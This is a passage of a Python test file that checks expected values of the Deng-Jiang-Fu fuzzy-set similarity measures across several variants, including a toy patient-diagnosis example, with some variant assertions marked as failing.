assert_almost_equal(deng_jiang_fu(A2, B, DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.941, decimal=3)
assert_almost_equal(deng_jiang_fu(A3, B, DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.975, decimal=3)
assert_almost_equal(deng_jiang_fu(A1, B, DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.667, decimal=3)
assert_almost_equal(deng_jiang_fu(A2, B, DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.667, decimal=3)
assert_almost_equal(deng_jiang_fu(A3, B, DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.766, decimal=3)
# Example 3
diagnoses, patients = load_patients_diagnoses()
viral_fever, malaria, typhoid, stomach_problem, chest_problem = diagnoses
al, bob, joe, ted = patients
assert_almost_equal(deng_jiang_fu(al, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.467,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.437,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.608,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.698,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.683,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.81,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.681,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.634, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(al, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.947,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.706,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.517,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.489,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.657,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.709,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.69, decimal=3)
assert_almost_equal(deng_jiang_fu(al, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.82,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.695,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.65, decimal=3) # fails
assert_almost_equal(deng_jiang_fu(al, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5),
0.946, decimal=3)
assert_almost_equal(deng_jiang_fu(al, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.721,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.544,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.474,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.643,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.698,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.661,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.8,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.667,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.619, decimal=3) # fails
assert_almost_equal(deng_jiang_fu(al, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5),
0.92, decimal=3)
assert_almost_equal(deng_jiang_fu(al, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.691,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.216,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.186,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1),
0.313, decimal=3)
assert_almost_equal(deng_jiang_fu(al, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.393,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.361,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.54,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.37,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.304, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(al, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.736,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1),
0.339, decimal=3)
assert_almost_equal(deng_jiang_fu(al, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.26,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.184,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.311,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.375,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.324,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.5,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.333,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.269, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(al, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.678,
decimal=3)
assert_almost_equal(deng_jiang_fu(al, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.293,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.348,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.28,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.437,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.518,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.476,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.67,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.504,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.441, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(bob, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.831,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.508,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.3, decimal=3)
assert_almost_equal(deng_jiang_fu(bob, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.21,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.348,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.419,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.352,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.54,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.37,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.304, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(bob, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.694,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.34,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.415,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.366,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.536,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.594,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.567,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.74,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.587,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.531, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(bob, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.898,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.605,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.641,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.635,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1),
0.777, decimal=3)
assert_almost_equal(deng_jiang_fu(bob, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.826,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.825,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.9,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.818,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.79, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(bob, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.986,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1),
0.844, decimal=3)
assert_almost_equal(deng_jiang_fu(bob, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.371,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.309,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.472,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.509,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.463,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.64,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.471,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.406, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(bob, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.802,
decimal=3)
assert_almost_equal(deng_jiang_fu(bob, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.464,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.363,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.348,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.516,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.618,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.603,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.75,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.6,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.545, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(joe, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.915,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.617,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.344,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.308,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.471,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.533,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.492,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.68,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.515,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.453, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(joe, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.844,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.52,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.498,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.47,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.639,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.712,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.7, decimal=3)
assert_almost_equal(deng_jiang_fu(joe, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.82,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.695,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.65, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(joe, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.944,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.721,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.32,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.241,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1),
0.388, decimal=3)
assert_almost_equal(deng_jiang_fu(joe, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.512,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.452,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.6,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.429,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.363, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(joe, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.762,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1),
0.415, decimal=3)
assert_almost_equal(deng_jiang_fu(joe, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.277,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.214,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.353,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.449,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.387,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.54,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.37,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.304, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(joe, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.7,
decimal=3)
assert_almost_equal(deng_jiang_fu(joe, chest_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.34,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.407,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.403,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.574,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.672,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.672,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.8,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.667,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.619, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(ted, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.954,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, viral_fever, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.691,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.421,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.401,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.572,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.624,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.61,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.77,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.626,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.574, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(ted, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.927,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, malaria, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.648,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.318,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.31,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.474,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_1, ), 0.541,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_2, ), 0.532,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.71,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_2_4, ), 0.55,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.491, decimal=3) # fails
assert_almost_equal(
deng_jiang_fu(ted, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.897,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, typhoid, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_3_3, p=1), 0.561,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_1, ), 0.264,
decimal=3)
assert_almost_equal(deng_jiang_fu(ted, stomach_problem, similarity_type=DENG_JIANG_FU_MONOTONIC_TYPE_1_2, ), 0.243,
decimal=3)
